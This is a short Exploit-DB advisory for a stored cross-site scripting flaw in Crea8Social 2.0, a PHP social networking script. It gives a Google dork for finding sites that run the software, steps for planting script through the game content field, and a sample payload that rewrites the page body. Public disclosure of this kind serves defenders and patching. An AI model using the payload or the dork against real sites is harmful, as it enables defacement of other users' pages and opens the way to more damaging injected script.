Crea8Social 2.0 - Cross-Site Scripting Change Interface

EDB-ID:

35691




Platform:

PHP

Date:

2015-01-04


# Exploit Title: Crea8Social v.2.0 XSS Change Interface
# Google Dork: intext:Copyright © 2014 CreA8social.
# Date: January 3, 2015
# Exploit Author: r0seMary
# Vendor Homepage: http://crea8social.com
# Software Link: http://codecanyon.net/item/crea8social-php-social-networking-platform-v20/9211270 or http://crea8social.com
# Version: v.2.0 (Latest version)
# Tested on: Windows 7
# CVE : -
================================================================================
Bismillahirahmanirahim
Assalamualaikum Wr.Wb

--[Fatal Xss Vulnerability]--
1. Register on the site
2. Go to Menu, Click Game
3. Add Game
4. At Game Content, enter your xss code. for example:
<script>document.body.innerHTML="your text here"</script><noscript>

look at the result, the user interface change into your xss code ;)

Proof of Concept:
http://104.131.164.9/demo/games/124 (Crea8Social Official Site)

./r0seMary
Wassalamualaikum.wr.wb